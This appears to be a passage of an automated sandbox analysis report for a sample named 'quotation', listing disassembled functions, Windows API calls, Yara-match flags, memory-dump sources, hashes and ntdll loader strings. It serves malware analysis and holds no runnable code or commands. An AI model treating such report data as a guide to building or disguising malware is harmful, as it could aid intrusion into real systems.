                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 28 42ce33-42ce77 call 404883 call 42dd13 RtlFreeHeap
                                                                                  APIs
                                                                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042CE72
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381205965.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_quotation.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FreeHeap
                                                                                  • String ID: qiA
                                                                                  • API String ID: 3298025750-529955485
                                                                                  • Opcode ID: e3b5d95ba1a83d426d625c5e4c7fafcd7ca98a1b0cb9b90bc850c9ae22092b0e
                                                                                  • Instruction ID: 307251ad091670c87d9754cbc308c92c0932808cc59762c095a9376aec0cd4cc
                                                                                  • Opcode Fuzzy Hash: e3b5d95ba1a83d426d625c5e4c7fafcd7ca98a1b0cb9b90bc850c9ae22092b0e
                                                                                  • Instruction Fuzzy Hash: 0CE06D722042547BCB14EE99DC41EDB37ACEFC9714F00442EF909A7241C770B91086B5
                                                                                  Function 00417CDF Relevance: 1.6, APIs: 1, Instructions: 91libraryloaderCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 42 417cdf-417d05 43 417d06-417d07 42->43 44 417d09-417d18 43->44 45 417d6c-417d6e 43->45 48 417d1a-417d45 44->48 49 417ccf-417cdb 44->49 46 417d70-417d81 45->46 47 417dbe-417dde call 42ba63 45->47 48->43 59 417d47-417d48 48->59 56 417c83-417c97 LdrLoadDll 49->56 57 417c9a-417c9d 49->57 56->57 59->45
                                                                                  APIs
                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417C95
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381205965.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_quotation.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Load
                                                                                  • String ID:
                                                                                  • API String ID: 2234796835-0
                                                                                  • Opcode ID: a74df69d41897592aaf7166ddb8974ec87685279e0badbf6da0a133babb8fc0f
                                                                                  • Instruction ID: ce8e9651cd2f2632962265eba7574f4be5e24a99500c9861ae4b74542ff918d8
                                                                                  • Opcode Fuzzy Hash: a74df69d41897592aaf7166ddb8974ec87685279e0badbf6da0a133babb8fc0f
                                                                                  • Instruction Fuzzy Hash: F521F17254C20A9BCB019FB8EC41BF4B774CF06324F208799DCAD9B2D1E6255D4687D2
                                                                                  Function 00417C1C Relevance: 1.5, APIs: 1, Instructions: 49libraryloaderCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 60 417c1c-417c1e 61 417c20-417c4c call 42f753 60->61 62 417c58-417c60 60->62 74 417c52-417c60 call 42fd53 61->74 75 417c4e-417c51 61->75 63 417c70-417c81 call 42e1f3 62->63 64 417c62-417c6d call 42fff3 62->64 71 417c83-417c97 LdrLoadDll 63->71 72 417c9a-417c9d 63->72 64->63 71->72 74->63 74->64
                                                                                  APIs
                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417C95
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381205965.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_quotation.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Load
                                                                                  • String ID:
                                                                                  • API String ID: 2234796835-0
                                                                                  • Opcode ID: 1fd0e5ac93c599581ea8bd70fbed3e05817cf44cc4c3a5592a884bcc08fa010a
                                                                                  • Instruction ID: 75b5f9b12f12b08821b09bdb01f26dfbe1d2dcd7f16dd92e0ccb1d816d0901d5
                                                                                  • Opcode Fuzzy Hash: 1fd0e5ac93c599581ea8bd70fbed3e05817cf44cc4c3a5592a884bcc08fa010a
                                                                                  • Instruction Fuzzy Hash: 4801F5B1E44109ABDF10DBA0DC42FDE77749B14308F0082BAE9189B280F635E749C791
                                                                                  Function 0042CDE3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 93 42cde3-42ce27 call 404883 call 42dd13 RtlAllocateHeap
                                                                                  APIs
                                                                                  • RtlAllocateHeap.NTDLL(?,0041E9BA,?,?,00000000,?,0041E9BA,?,?,?), ref: 0042CE22
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381205965.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_quotation.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap
                                                                                  • String ID:
                                                                                  • API String ID: 1279760036-0
                                                                                  • Opcode ID: bfaddf89e5a8eb70fee58dbc14e955cd0c08b1bcf189c1afe2af08f3aab36983
                                                                                  • Instruction ID: a4553a69e7b92f9cf539882023bc9044ba2095210ba8bf1258456adc3d3cad5f
                                                                                  • Opcode Fuzzy Hash: bfaddf89e5a8eb70fee58dbc14e955cd0c08b1bcf189c1afe2af08f3aab36983
                                                                                  • Instruction Fuzzy Hash: 13E039762003057BDA14EE59EC41EAB37ACEF89754F104419FE09A7241D770B9108AB5
                                                                                  Function 0042CE83 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 103 42ce83-42cebf call 404883 call 42dd13 ExitProcess
                                                                                  APIs
                                                                                  • ExitProcess.KERNEL32(?,00000000,00000000,?,07461022,?,?,07461022), ref: 0042CEBA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381205965.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_quotation.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExitProcess
                                                                                  • String ID:
                                                                                  • API String ID: 621844428-0
                                                                                  • Opcode ID: 604045ff2199d70e6ced359132bb827253c9192b951670fad5067483bfa99023
                                                                                  • Instruction ID: e3fc04d785b94c74c51f8313a7f33e58d860eb092d5abf4673d4ecc5aa500898
                                                                                  • Opcode Fuzzy Hash: 604045ff2199d70e6ced359132bb827253c9192b951670fad5067483bfa99023
                                                                                  • Instruction Fuzzy Hash: 7AE08C762002147BE620FB5ADC05F9B776CDFC5724F10842AFA08AB281CAB1BA0187F5
                                                                                  Function 00417CD6 Relevance: 1.5, APIs: 1, Instructions: 20libraryloaderCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 108 417cd6-417cdb 110 417c83-417c97 LdrLoadDll 108->110 111 417c9a-417c9d 108->111 110->111
                                                                                  APIs
                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417C95
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381205965.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_quotation.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Load
                                                                                  • String ID:
                                                                                  • API String ID: 2234796835-0
                                                                                  • Opcode ID: b0c3561975e8df5829d7d66e24a3c02e50a0ddf0ef6dad8d752497c06571edb3
                                                                                  • Instruction ID: 3234135dea13a840063d5cb5e5c33c926c874a0ab7bab67cfa608a0389ac5317
                                                                                  • Opcode Fuzzy Hash: b0c3561975e8df5829d7d66e24a3c02e50a0ddf0ef6dad8d752497c06571edb3
                                                                                  • Instruction Fuzzy Hash: 01E0127564410EABEB40CFC4C881FEDB3B4EB08208F109285E91C97240E530AA46CB85
                                                                                  Function 012F2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 112 12f2c0a-12f2c0f 113 12f2c1f-12f2c26 LdrInitializeThunk 112->113 114 12f2c11-12f2c18 112->114
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: e1ec73d7505f00c8d874a1a1c83aeead327ef114b476f99799a86e40f60a08c1
                                                                                  • Instruction ID: 09c02f4eb3061897af1ed3fa233f0d80d48177fb1370d8f4abb0f61508f51e93
                                                                                  • Opcode Fuzzy Hash: e1ec73d7505f00c8d874a1a1c83aeead327ef114b476f99799a86e40f60a08c1
                                                                                  • Instruction Fuzzy Hash: 21B09B71D019D5C5FA12E76446087177940B7D1705F16C075D3030685F8738C1D5E375

                                                                                  Non-executed Functions

                                                                                  Function 01332349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-2160512332
                                                                                  • Opcode ID: 17f2687e3309df28069a3497a1ae7d517ee28b25d4d16e97c41a2eca8474091a
                                                                                  • Instruction ID: 3d409830899ded34dd2c63721adac31440f223da5dfeefaf99c86b87b77d7a85
                                                                                  • Opcode Fuzzy Hash: 17f2687e3309df28069a3497a1ae7d517ee28b25d4d16e97c41a2eca8474091a
                                                                                  • Instruction Fuzzy Hash: 20929F71618342AFE721DF28C880B6BBBE8BBC4758F04492DFA95D7251D770E844CB96
                                                                                  Function 012E8620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • Critical section debug info address, xrefs: 0132541F, 0132552E
                                                                                  • Thread identifier, xrefs: 0132553A
                                                                                  • undeleted critical section in freed memory, xrefs: 0132542B
                                                                                  • Critical section address, xrefs: 01325425, 013254BC, 01325534
                                                                                  • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 013254CE
                                                                                  • double initialized or corrupted critical section, xrefs: 01325508
                                                                                  • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 013254E2
                                                                                  • Critical section address., xrefs: 01325502
                                                                                  • 8, xrefs: 013252E3
                                                                                  • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0132540A, 01325496, 01325519
                                                                                  • corrupted critical section, xrefs: 013254C2
                                                                                  • Invalid debug info address of this critical section, xrefs: 013254B6
                                                                                  • Address of the debug info found in the active list., xrefs: 013254AE, 013254FA
                                                                                  • Thread is in a state in which it cannot own a critical section, xrefs: 01325543
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                  • API String ID: 0-2368682639
                                                                                  • Opcode ID: 17d2e6dcda1e76e8bab8855f4c954ecb305945519ff0936698061c53444d12a4
                                                                                  • Instruction ID: b68c454fa91e60474a77f64ca8d1419893e776b5818a08af79b8869f1e5cb4d0
                                                                                  • Opcode Fuzzy Hash: 17d2e6dcda1e76e8bab8855f4c954ecb305945519ff0936698061c53444d12a4
                                                                                  • Instruction Fuzzy Hash: 3A818BB0A50358EFDF20DF99C845BAEBBB9FB09704F644119F605B7640D375A940CB90
                                                                                  Function 012E29F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01322506
                                                                                  • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01322602
                                                                                  • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 013225EB
                                                                                  • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01322412
                                                                                  • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 013222E4
                                                                                  • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01322624
                                                                                  • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01322409
                                                                                  • RtlpResolveAssemblyStorageMapEntry, xrefs: 0132261F
                                                                                  • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01322498
                                                                                  • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 013224C0
                                                                                  • @, xrefs: 0132259B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                  • API String ID: 0-4009184096
                                                                                  • Opcode ID: bade76fce5671aea989e7522c38056f43a29cc82e0dc66785d9a9acc17f36faa
                                                                                  • Instruction ID: b5ee401e5eb4eae37e6216947bef467ee33c324ffe51e2f19607962afe98d1dd
                                                                                  • Opcode Fuzzy Hash: bade76fce5671aea989e7522c38056f43a29cc82e0dc66785d9a9acc17f36faa
                                                                                  • Instruction Fuzzy Hash: 51029FB1D10229DBDB31DB58CC85BAAB7B8AB44304F4151EAE709B7241EB709E84CF59
                                                                                  Function 01358B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                  • API String ID: 0-2515994595
                                                                                  • Opcode ID: f4a605a99fc7c0c2c74218dcac2741e51f0110dc53e95f58f9d86bc4acd6d0e1
                                                                                  • Instruction ID: 4c1fdf001f2b618f3040e1b9c43b765429173a2d14316d42d31edd66114bfdf4
                                                                                  • Opcode Fuzzy Hash: f4a605a99fc7c0c2c74218dcac2741e51f0110dc53e95f58f9d86bc4acd6d0e1
                                                                                  • Instruction Fuzzy Hash: 5851F0711253459BD725DF1A8844FABBBECEF94B48F14096DAE55C3280E770D504CB92
                                                                                  Function 01360274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                  • API String ID: 0-1700792311
                                                                                  • Opcode ID: 9623cf63520d3d1fde671cd0ce5228a99783f4330b1204812352c86b3bb2d0f4
                                                                                  • Instruction ID: 17ee7c8d6f6990c4e8a82492ce559735d95e02157c2305c9886b1f552c133807
                                                                                  • Opcode Fuzzy Hash: 9623cf63520d3d1fde671cd0ce5228a99783f4330b1204812352c86b3bb2d0f4
                                                                                  • Instruction Fuzzy Hash: C0D10C31610286DFDB2ADF68C442AAEBBF9FF4A718F48C049F545AB656C7759880CF10
                                                                                  Function 013389B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • HandleTraces, xrefs: 01338C8F
                                                                                  • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01338A3D
                                                                                  • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01338A67
                                                                                  • VerifierDlls, xrefs: 01338CBD
                                                                                  • VerifierFlags, xrefs: 01338C50
                                                                                  • AVRF: -*- final list of providers -*- , xrefs: 01338B8F
                                                                                  • VerifierDebug, xrefs: 01338CA5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                  • API String ID: 0-3223716464
                                                                                  • Opcode ID: f35c45fea60af51dbba33c45a9332d07d6b62c54d6027f405c438ea362e34889
                                                                                  • Instruction ID: 4fc527d186f3eb273cb1a40469d15ad8a4128abd115037d73c26fe441b6c69b6
                                                                                  • Opcode Fuzzy Hash: f35c45fea60af51dbba33c45a9332d07d6b62c54d6027f405c438ea362e34889
                                                                                  • Instruction Fuzzy Hash: B19127B1645706EFEB21EF6C8880B6BB7A8EBD471CF840698FA416B240C7709C05C799
                                                                                  Function 012BEA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                  • API String ID: 0-1109411897
                                                                                  • Opcode ID: eac40b4c91709048483870268d44fb517e6e3941a65514dee728563ad6eba4c9
                                                                                  • Instruction ID: 7be815b16073b3b5a2de8a4648bf37b38fdee4858d0fed2251f1e96633d307cd
                                                                                  • Opcode Fuzzy Hash: eac40b4c91709048483870268d44fb517e6e3941a65514dee728563ad6eba4c9
                                                                                  • Instruction Fuzzy Hash: E1A25974A2562A8FDB68CF19CD887E9BBB5BF45348F1442E9D90DA7254DB709E80CF00
                                                                                  Function 012E63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-792281065
                                                                                  • Opcode ID: b87e5a0fb3d5b5e4ff1bda01f60d25b98124c67657df3a34b037ce90ef1d467b
                                                                                  • Instruction ID: e971a28ae8799b0fd7722c1f7974d00af71cf397209d40e3a8f39359d967e070
                                                                                  • Opcode Fuzzy Hash: b87e5a0fb3d5b5e4ff1bda01f60d25b98124c67657df3a34b037ce90ef1d467b
                                                                                  • Instruction Fuzzy Hash: FE912870B20326DBEB35EF59D849BAA7BE5FF61B18F940128E6046B6C1D7B09801C7D0
                                                                                  Function 012A645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 01309A11, 01309A3A
                                                                                  • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01309A01
                                                                                  • LdrpInitShimEngine, xrefs: 013099F4, 01309A07, 01309A30
                                                                                  • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01309A2A
                                                                                  • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 013099ED
                                                                                  • apphelp.dll, xrefs: 012A6496
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-204845295
                                                                                  • Opcode ID: 1001b4e2862f0abdd33d30b816242483820ce3385aa083d8ecf72790777c1b7e
                                                                                  • Instruction ID: 8dccf0b44a7bdcf400f9e04df945a67f4f667e3d4281adb59adf7b7428cd4639
                                                                                  • Opcode Fuzzy Hash: 1001b4e2862f0abdd33d30b816242483820ce3385aa083d8ecf72790777c1b7e
                                                                                  • Instruction Fuzzy Hash: 1E51C4712283059FE721EF28D855BABBBE8FB84748F44091DF6899B191D730E944CB92
                                                                                  Function 012E2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01322178
                                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01322180
                                                                                  • RtlGetAssemblyStorageRoot, xrefs: 01322160, 0132219A, 013221BA
                                                                                  • SXS: %s() passed the empty activation context, xrefs: 01322165
                                                                                  • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0132219F
                                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 013221BF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                  • API String ID: 0-861424205
                                                                                  • Opcode ID: 2e5dbe475ab4751b3c0f771ac18b4102858867c22d7a9b0226645e90219670ab
                                                                                  • Instruction ID: a951ca01693fbe7b028c678c65217bea4d7e925a1dcd771f70cb3353f9abb500
                                                                                  • Opcode Fuzzy Hash: 2e5dbe475ab4751b3c0f771ac18b4102858867c22d7a9b0226645e90219670ab
                                                                                  • Instruction Fuzzy Hash: 71314B3AFA0225B7FB219A9ECC45F6B7BBCEF54A54F150059FB05AB140D270AA01C7A1
                                                                                  Function 012EC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 012EC6C3
                                                                                  • Loading import redirection DLL: '%wZ', xrefs: 01328170
                                                                                  • LdrpInitializeImportRedirection, xrefs: 01328177, 013281EB
                                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 01328181, 013281F5
                                                                                  • Unable to build import redirection Table, Status = 0x%x, xrefs: 013281E5
                                                                                  • LdrpInitializeProcess, xrefs: 012EC6C4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                  • API String ID: 0-475462383
                                                                                  • Opcode ID: 22e33dabbd88038e2fd1707e470f3f81b850a8902883f23f72ce669a29eb88d6
                                                                                  • Instruction ID: 2f572c093b4850336a286a435b4b14c0a9b48f97232c701a7afd886f2f1a1b5f
                                                                                  • Opcode Fuzzy Hash: 22e33dabbd88038e2fd1707e470f3f81b850a8902883f23f72ce669a29eb88d6
                                                                                  • Instruction Fuzzy Hash: D93102716643529FD220FF29D94AE2BBBD4AF95B14F400558F944AB291E620EC04CBA2
                                                                                  Function 012F096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 012F2DF0: LdrInitializeThunk.NTDLL ref: 012F2DFA
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 012F0BA3
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 012F0BB6
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 012F0D60
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 012F0D74
                                                                                  Memory Dump Source
